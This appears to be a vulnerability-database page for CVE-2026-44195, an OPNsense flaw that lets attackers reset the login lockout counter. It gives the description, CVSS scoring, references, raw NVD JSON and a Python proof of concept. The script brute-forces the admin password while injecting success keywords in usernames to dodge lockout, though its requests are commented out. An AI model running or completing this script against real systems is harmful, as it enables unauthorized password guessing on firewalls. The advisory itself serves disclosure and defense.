CVE-2026-44195

Description

OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.7, a logic flaw in the OPNsense lockout_handler allows an unauthenticated attacker to continuously reset the authentication failure counter for their IP address. By interjecting a crafted username containing a success keyword ("Accepted" or "Successful login") between normal brute-force attempts, an attacker can prevent the failure counter from ever reaching the lockout threshold. This vulnerability is fixed in 26.1.7.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OPNsense < 26.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "https://<opnsense-ip>/index.php"
username_target = "admin"

# Keywords that trigger the counter reset based on the vulnerability description
bypass_keywords = ["Accepted", "Successful login"]

# Payload list including normal passwords and bypass attempts
passwords = ["123456", "admin", "password", "root"]

def exploit():
    for pwd in passwords:
        # Step 1: Attempt normal brute force
        data = {'user': username_target, 'password': pwd}
        # r = requests.post(target_url, data=data) # Actual request
        print(f"[+] Trying password: {pwd}")

        # Step 2: Inject crafted username to reset lockout counter
        # The logic flaw resets the counter if the log line contains success keywords
        for keyword in bypass_keywords:
            bypass_user = f"test \"{keyword}\""
            bypass_data = {'user': bypass_user, 'password': 'irrelevant'}
            # r = requests.post(target_url, data=bypass_data) # Actual request
            print(f"[*] Sending bypass payload with keyword: {keyword}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44195
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44195
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44195/
[4] VulDB https://vuldb.com/cve/CVE-2026-44195
[5] https://github.com/opnsense/core/security/advisories/GHSA-h3vx-4q27-rc42
[6] https://gist.github.com/sopex/b9786e72e2a5d9b1bbd81ed8477c351b

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44195", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:43.820", "lastModified": "2026-05-14T17:18:18.640", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.7, a logic flaw in the OPNsense lockout_handler allows an unauthenticated attacker to continuously reset the authentication failure counter for their IP address. By interjecting a crafted username containing a success keyword (\"Accepted\" or \"Successful login\") between normal brute-force attempts, an attacker can prevent the failure counter from ever reaching the lockout threshold. This vulnerability is fixed in 26.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://github.com/opnsense/core/security/advisories/GHSA-h3vx-4q27-rc42", "source": "[email protected]"}, {"url": "https://gist.github.com/sopex/b9786e72e2a5d9b1bbd81ed8477c351b", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}